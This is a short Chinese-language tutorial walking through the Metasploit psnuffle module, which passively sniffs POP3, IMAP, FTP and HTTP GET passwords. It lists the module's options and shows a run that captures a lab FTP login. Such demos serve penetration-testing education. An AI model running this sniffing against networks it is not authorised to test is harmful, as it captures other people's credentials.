seo优化_前端开发_渗透技术Max Moser发布了一个名为psnuffle的Metasploit密码嗅探模块,它将类似于工具dsniff一样从网络上嗅探密码。它目前支持POP3,IMAP,FTP和HTTP GET。
使用psnuffle模块非常简单。有一些可用选项,但该模块“开箱即用”时效果很好。
msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all". SNAPLEN 65535 yes The number of bytes to capture TIMEOUT 1 yes The number of seconds to wait for new data
有一些选项可用,包括导入pcap捕获文件的功能。我们将以默认模式运行psnuffle扫描器。
msf auxiliary(psnuffle) > run [*] Auxiliary module execution completed [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb... [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb... [*] Sniffing traffic..... [*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> victim / pass (220 3Com 3CDaemon FTP Server Version 2.0)
那里!我们已成功登录FTP。这是用于被动信息收集的出色工具。
